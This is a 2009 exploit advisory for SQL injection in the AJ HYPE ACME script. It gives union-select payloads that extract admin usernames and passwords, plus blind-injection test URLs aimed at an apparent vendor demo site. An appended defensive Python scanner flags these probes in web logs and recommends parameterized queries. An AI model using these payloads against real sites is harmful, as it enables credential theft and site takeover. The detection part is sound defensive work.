AJ HYPE ACME suffers from multiple remote SQL injection vulnerabilities.
/*
AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities
Discovered by : MizoZ
Contact : mizozx@gmail.com
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
SQL Injection news.php (GET : id) :
[HOST]/[PATH]/news.php?id=[SQL CODE]
SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--
-----------------------------
SQL Injection topic_detail.php (GET : id) :
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL CODE]
SQL CODE :
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--
ONLY IN ACME EXTENSION
-----------------------------
Blind SQL Injection readarticle.php (GET : artid)
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1-- ==>> TRUE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0-- ==>> FALSE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5-- ==>> TRUE
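
Added example (not part of the original advisory): a log check a defender can run over web server access logs to find requests where the three parameters named above (news.php id, topic_detail.php id, readarticle.php artid) carry anything other than a plain integer. The combined log format, the assumption that these parameters are numeric IDs, the label names and the sample lines are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> GET parameter named in the advisory. Treating each as a numeric
# ID is an assumption of this example.
WATCHED = {"news.php": "id", "topic_detail.php": "id", "readarticle.php": "artid"}

# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+"')

def classify(value):
    """Return None for a plain integer, else a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    lowered = value.lower()
    if re.search(r"\bunion\b.*\bselect\b", lowered):
        return "union-select"
    if re.search(r"\b(?:and|or)\b", lowered):
        return "boolean-test"
    return "non-numeric"

def scan(lines):
    """Return (line_no, script, param, label) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl decodes '+' and %XX, so encoded payloads are compared decoded.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            label = classify(value) if key == param else None
            if label:
                findings.append((line_no, script, param, label))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2009:10:00:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jul/2009:10:00:05 +0000] "GET /news.php?id=null+union+select+1,2,3,4,5+from+admin-- HTTP/1.1" 200 4801',
    '198.51.100.7 - - [29/Jul/2009:10:00:09 +0000] "GET /acme/article/readarticle.php?artid=3+and+1=0-- HTTP/1.1" 200 2210',
    '192.0.2.10 - - [29/Jul/2009:10:00:12 +0000] "GET /forum/topic_detail.php?id=7 HTTP/1.1" 200 9000',
    '198.51.100.7 - - [29/Jul/2009:10:00:15 +0000] "GET /forum/topic_detail.php?id=7%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

This only detects probing after the fact; the fix belongs in the application, by binding id and artid as integers in parameterized queries.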